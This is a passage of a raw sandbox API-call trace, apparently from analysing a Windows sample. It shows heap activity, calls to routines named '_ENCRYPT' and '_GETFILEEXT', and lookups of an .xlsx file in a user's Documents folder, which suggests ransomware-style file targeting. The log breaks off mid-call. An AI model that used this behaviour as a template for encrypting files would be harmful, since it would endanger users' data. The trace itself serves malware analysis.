(in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0169.183] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.184] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.184] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0169.184] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0169.185] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0169.185] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.185] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0169.186] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.186] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.186] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.187] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0169.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0169.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda38 [0169.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bda38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.187] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0169.187] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0169.187] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0169.187] CloseHandle (hObject=0x138) returned 1 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0169.188] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0169.188] FreeLibrary (hLibModule=0x75990000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0169.188] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0169.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0169.189] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0169.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0169.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0169.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0169.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0169.189] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0169.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0169.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0169.189] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0169.189] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0169.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0169.190] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0169.190] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0169.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0169.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0169.190] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.190] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.190] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0x90add8 [0169.190] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0169.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.191] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbdc053e0, ftCreationTime.dwHighDateTime=0x1d57286, ftLastAccessTime.dwLowDateTime=0x290dce00, ftLastAccessTime.dwHighDateTime=0x1d5aa6f, ftLastWriteTime.dwLowDateTime=0x290dce00, ftLastWriteTime.dwHighDateTime=0x1d5aa6f, nFileSizeHigh=0x0, nFileSizeLow=0xa915, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="g_g2urcnwKcCd17PjNc.xlsx", cAlternateFileName="G_G2UR~1.XLS")) returned 0x90add8 [0169.191] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0169.191] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.191] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0169.192] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\g_g2urcnwKcCd17PjNc.xlsx\"", 